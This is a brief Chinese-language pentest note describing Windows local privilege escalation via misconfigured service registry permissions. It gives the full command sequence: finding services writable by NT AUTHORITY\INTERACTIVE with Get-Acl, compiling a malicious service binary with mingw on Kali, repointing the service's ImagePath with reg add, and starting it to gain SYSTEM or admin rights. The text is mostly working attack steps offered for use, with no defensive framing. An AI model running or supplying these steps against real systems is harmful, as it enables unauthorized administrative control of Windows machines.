注册表提权原理:
将一个伪造的服务,通过注册表写入,在开启这个服务,那么伪造的服务就会运行我们的恶意代码(服务是以system权限运行的)
NT AUTHORITY\INTERACTIVE 当前用户的权限,利用他可以完全控制注册表的权限提权(如果配置不当)
powershell
Get-Acl -Path hklm:\System\CurrentControlSet\services\* | select Path,AccessToString |Format-List > 1.txt
在1.txt中查找"NT AUTHORITY\INTERACTIVE",直到找到一个Allow FullControl
powershellGet-Acl -Path hklm:\System\CurrentControlSet\services\a | fl (a为NT AUTHORITY\INTERACTIVE用户Allow FullControl的服务)
把windows_service.c在kali中编译成exe文件
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
然后放到temp目录下,然后把提升权限的exe路径添加到查出来的服务
reg add HKLM\SYSTEM|CurrentControlSet\services\a /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
添加成功后,运行伪造好的服务:
sc start a
net user 查看已经是admin用户组了
